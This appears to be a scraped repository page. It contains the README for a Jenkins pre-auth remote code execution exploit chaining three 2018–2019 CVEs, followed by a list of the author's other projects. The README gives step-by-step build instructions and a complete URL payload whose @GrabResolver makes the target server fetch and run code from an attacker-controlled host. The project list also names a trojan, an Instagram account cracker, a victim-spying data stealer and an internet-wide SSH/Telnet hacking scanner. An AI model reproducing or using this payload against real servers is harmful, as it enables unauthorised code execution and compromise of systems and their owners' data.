There are no reviews yet. Be the first to send feedback to the community and the maintainers!
JENKINS UNAUTHENTICATED REMOTE CODE EXECUTION --------------------------------------------- Exploit compiled by me, but full credits for exploit discovery and exploit chaining go to Orange Tsai (orange.tw). It chains CVE-2018-1000861, CVE-2019-1003005 and CVE-2019-1003029 to a more reliable and elegant pre-auth remote code execution! Read his write-ups on this exploit here - Part 1: https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html Part 2: http://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html His github: https://github.com/orangetw INSTRUCTIONS: ------------- - Edit code/Payload.java to your specifications, then run build.sh to generate a jar and copy it to the web folder. - Once that is finished, copy the inner contents of www/ to a webserver. - In the URL payload, replace <TARGET HOST> with the hostname of the server, and <EXPLOIT HOST> to the hostname of where you uploaded your files. URL Payload: ------------ http://<TARGET HOST>/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile ?value= @GrabConfig(disableChecksums=true)%0a @GrabResolver(name='payload', root='http://<EXPLOIT HOST>')%0a @Grab(group='package', module='payload', version='1')%0a import Payload;
Emotion
๐ Recognizes human faces and their corresponding emotions from a video or webcam feed. Powered by OpenCV and Deep Learning.Pine
๐ฒ Aimbot powered by real-time object detection with neural networks, GPU accelerated with Nvidia. Optimized for use with CS:GO.GoAT
๐ GoAT (Golang Advanced Trojan) is a trojan that uses Twitter as a C&C servertts
๐ ๐ A simple text-to-speech tool. Converts your text to speech with any of StreamElements voices. Frontend built with Gatsby.Knock
๐ Scan the entire internet for SSH and Telnet services. Then hack them.Pad
๐ An online, collaborative, real-time notepad built with WebSockets and NodeJSbandcamp-ripper
๐ต Rips MP3 files from Bandcamp album URL'sDonut
๐ค A JavaScript implementation of the infamous "donut.c" programA-picture-of-Jeff-Goldblum
๐ฏ This repository is a picture of Jeff GoldblumWizardli
๐ An ultra fast YouTube-to-MP3 downloader and transcoderMusicalFractals
โจ Generates 3D, animated fractals by analyzing the waveform of audio filesBitBuster
๐ Multi-threaded Instagram account crackerBoilerChat
๐ BoilerChat is a live, anonymous, online chatroom for Purdue students.WhoHackedMe
๐ Instantly search the web for hacked data. Check if you appear in any database leaks.react-bootstrap-webpack-Boilerplate
Start any web project with ease by using this React, Webpack, Bootstrap, and Babel boilerplate!resume
Thank you kanye, very cool!Reverb
๐ฅ An audio visualizer built on the Web Audio APInetpaste
A command line pastebin accessible through netcatlivespy
LiveSpy monitors a victims computer and sends sensitive information to the hacker. Written with Go and Websockets.VaporwaveText
A simple React app to convert "normal text" to "๏ฝ๏ฝ๏ฝ๏ฝ๏ฝ๏ฝ๏ฝ๏ฝ๏ฝ ใ๏ฝ๏ฝ ๏ฝ๏ฝ"string2bf
Converts a string to Brainf**k codeTransform
An HTML5 game that challenges the mind!Boilermake2018
Boilermake 2018 hackathon repoAimbotCalvin
Website for TSM Aimbot Calvinsuperkey
CODE39 brute forcerdraw.io
dingus
Vidya gameyf-downloader
Export data from Yahoo Finance to Excel spreadsheetsRedditBrowser
A simple full screen image and video browser for Redditsudoku-solver
A simple sudoku solver written in GoPyScrape
A super fast web crawling (slithering?) email scraper written entirely in Python.Love Open Source and this site? Check out how you can help us